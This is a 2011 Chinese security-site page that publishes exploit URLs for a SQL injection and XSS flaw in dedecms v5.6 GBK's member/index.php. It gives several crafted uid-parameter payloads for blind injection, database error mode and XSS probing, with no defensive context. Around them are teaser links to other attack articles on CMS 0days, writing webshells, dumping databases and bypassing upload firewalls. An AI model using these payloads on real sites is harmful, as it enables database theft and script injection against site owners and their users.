当前位置：代码网 > 服务器>网络安全>脚本攻防 > dedecms v5.6 GBK 注入漏洞利用(member/index.php)

dedecms v5.6 GBK 注入漏洞利用(member/index.php)

2011年08月19日 • 脚本攻防 •我要评论

dedecms v5.6 GBK 注入漏洞利用(member/index.php)会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS... 11-08-19

                    
						exp: 
htp://127.0.0.1/member/index.php?uid=&#039;%20||%20&#039;&#039;%20||%20&#039;%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7&#039;; 
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,xss 
exp: 
htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7'; 

htp://127.0.0.1/member/index.php?uid=%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7wfxssprobe'")/> 

htp://127.0.0.1/member/index.php?uid=%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7'">

aspcms企业建站系统0day漏洞介绍

aspcms企业建站系统0day漏洞介绍aspcms企业建站系统0day 2.0以上通杀2011-08-14 19:21aspcms开发的全新内核的开源企业建... [阅读全文]
Phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞

Phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞phpcms本地包含类漏洞，如果该文件包含了/include/common.inc.php就可... [阅读全文]
MYSQL_OUTPUT 脱裤(脱库)通用脚本(修正版)

MYSQL_OUTPUT 脱裤(脱库)通用脚本(修正版) 感谢各位的测试 , 下次再也不发垃圾脚本了，之前那个大家转走的都修正下吧 ,问题太多了. (几乎都没... [阅读全文]
ewebeditor 上传遇到防火墙限制的解决办法图文

ewebeditor 上传遇到防火墙限制的解决办法图文今天看了前面的原创帖子说到eweb遇到asp,asa,cer被限制访问拿不了shell,正好这个问题我是知道的。应该很多大…

2011年05月10日 • 网络安全
dedecms官方模板包含一句话后门木马

dedecms官方模板包含一句话后门木马应该是前几天出的那个dedecms的0day.官方的网站被日，然后被在风格模板里面值入了一句话木马。XXOO。... ... [阅读全文]
用JavaScript防止网站被挂IFRAME木马的方法

用JavaScript防止网站被挂IFRAME木马的方法网站挂马的最常见形式就是IFRAME挂马，即在你的网页中加入一段框架网页代码，这个框架网页中的内容便是... [阅读全文]

发表评论


验证码：

dedecms v5.6 GBK 注入漏洞利用(member/index.php)

2011年08月19日 • 脚本攻防 •我要评论

相关文章:

ewebeditor 上传遇到防火墙限制的解决办法 图文

发表评论

ewebeditor 上传遇到防火墙限制的解决办法图文